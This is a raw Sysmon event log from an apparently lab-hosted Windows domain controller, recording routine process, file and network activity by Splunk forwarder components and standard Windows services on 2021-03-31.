12:05:04.751{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.750{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:04.750{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:04.749{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.107{266CAFBE-656F-6064-4401-00000000AE01}68566852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.998{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7380D65808E1A0A6895D23D3B7DCE3E,SHA256=A7E4F7F67E86BC32C91C469B814BED92EEDA94CA2879A0705AB3B58CB603D401,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.510{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53635-false10.0.1.12-8000- 23542300x80000000000000009607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:05.013{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB0189E6D0B8A5FF1395D2E283C3E8C,SHA256=FC7B67EC2CCF814A3B814F56FB748939B29F1AA4E4B891C0C0D7C9E41DD8D3EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.527{266CAFBE-6572-6064-4601-00000000AE01}37767032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.372{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.090{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=729BDB7702CA4ACE9AB9B3A9CB61A7B3,SHA256=4C39C4908131D0480204D9A3FD85365D2608C81BACDF9EC014DAE692212990E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:06.012{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=54D4FB4CECE767138E0CC9729BC1D798,SHA256=4A3FBF81CC56644DE7BEED1BE6E221E6B8D88178E487E13EAD9B774F26C068CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.012{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=CAFF4F24058526D0ECCDAA2B14FFAA99,SHA256=DD47BECA9E71476BC5CF6EA64B480435E90F020A3421397EB8E0FB7F8D1EFECA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.839{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
